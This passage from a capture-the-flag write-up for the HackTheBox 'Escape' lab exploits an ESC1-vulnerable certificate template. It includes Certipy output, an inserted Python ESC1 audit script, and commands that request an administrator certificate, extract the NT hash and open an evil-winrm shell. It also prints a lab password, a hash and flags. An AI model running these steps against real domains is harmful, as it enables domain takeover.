└─$ cat 20250911143138_Certipy.txt
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2022-11-18T21:10:22+00:00
Template Last Modified : 2024-01-19T00:26:38+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
By looking at the template we can confirm that this is not a false positive from certipy-ad: we, as Domain Users, can enroll in the template; the EKU (extended key usage) includes Client Authentication; and the certificate name flag EnrolleeSuppliesSubject allows us to specify any UPN when requesting a certificate. The template also requires no manager approval and no authorized signatures, so nothing stands between the request and an issued certificate.
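To make that reasoning checkable, here is an added example (not from the write-up and not Certipy's own code) that parses the text output of certipy-ad find and evaluates the ESC1 preconditions for each template. The input is a constructed excerpt modelled on the output above; UserAuthenticationFixed is a hypothetical hardened copy that shows which controls remove ESC1.

```python
import re

# Constructed excerpt modelled on the certipy-ad 'find' text output above (indentation
# approximated). UserAuthentication carries the page's values; UserAuthenticationFixed is
# a hypothetical hardened copy added here to show what a remediated template looks like.
CERTIPY_TEXT = r"""
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Enabled                             : True
    Client Authentication               : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
    [+] User Enrollable Principals      : SEQUEL.HTB\Domain Users
  1
    Template Name                       : UserAuthenticationFixed
    Enabled                             : True
    Client Authentication               : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : True
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
"""

KV_RE = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]*?)\s*:\s*(?P<val>.*)$")
IDX_RE = re.compile(r"^\d+$")
SECTION_HEADERS = {"Permissions", "Enrollment Permissions", "Object Control Permissions"}
LOW_PRIV = {"domain users", "authenticated users", "domain computers", "everyone", "users"}


def parse_templates(text):
    """Parse the 'Certificate Templates' part of certipy text output into one
    {field: [values]} dict per template; multi-valued fields continue on colon-less lines."""
    templates, current, last_key, in_templates = [], None, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Certificate Templates":
            in_templates = True
        elif not in_templates:
            continue
        elif IDX_RE.match(line):                       # "0", "1", ... open a new template block
            current = {}
            templates.append(current)
            last_key = None
        elif line in SECTION_HEADERS or line.startswith("["):
            last_key = None                            # sub-headings and [+]/[!] notes end a value list
        elif (m := KV_RE.match(line)) and current is not None:
            last_key = m["key"].strip()
            current[last_key] = [m["val"].strip()]
        elif current is not None and last_key is not None:
            current[last_key].append(line)             # continuation line of the previous field
    return templates


def esc1_conditions(t):
    """Evaluate each ESC1 precondition for one parsed template; ESC1 holds when all are True."""
    def is_true(key):
        return t.get(key, ["False"])[0].lower() == "true"
    eku = {v.lower() for v in t.get("Extended Key Usage", [])}
    enrollers = {p.split("\\")[-1].lower() for p in t.get("Enrollment Rights", [])}
    return {
        "enabled": is_true("Enabled"),
        "enrollee supplies subject": is_true("Enrollee Supplies Subject"),
        "authentication EKU": is_true("Client Authentication") or is_true("Any Purpose") or not eku,
        "no manager approval": not is_true("Requires Manager Approval"),
        "no authorized signatures": t.get("Authorized Signatures Required", ["0"])[0] == "0",
        "low-privileged enrollment": bool(enrollers & LOW_PRIV),
    }


def audit(text):
    """Map template name -> {'esc1': bool, 'failing_conditions': [...]}; on a safe template the
    failing conditions are exactly the controls that protect it."""
    report = {}
    for t in parse_templates(text):
        conds = esc1_conditions(t)
        report[t["Template Name"][0]] = {
            "esc1": all(conds.values()),
            "failing_conditions": [name for name, ok in conds.items() if not ok],
        }
    return report
```

Running audit on the real Certipy text file would report UserAuthentication as ESC1 with no failing conditions, which is the confirmation the paragraph above makes by hand.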
We will request a certificate for the administrator using the same tool:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad req -username ryan.cooper@sequel.htb -password NuclearMosquito3 -target-ip 10.129.128.53 -ca sequel-DC-CA -template UserAuthentication -upn administrator@sequel.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: SEQUEL.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
We received the administrator's PFX file. We can use it to authenticate with certipy-ad, which will obtain a TGT for the administrator and then retrieve the account's NT hash:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip 10.129.128.53
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
We can now authenticate using the administrator's NT hash:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ evil-winrm -i 10.129.128.53 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::e158:c196:2a15:f372
Link-local IPv6 Address . . . . . : fe80::e158:c196:2a15:f372%4
IPv4 Address. . . . . . . . . . . : 10.129.128.53
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%4
10.129.0.1
Here we can get the flags:
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
9d57379bb44b21297dab730176c81157
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan.cooper\Desktop\user.txt
ac5eae2c8f5e9b0438a0b9833bf44522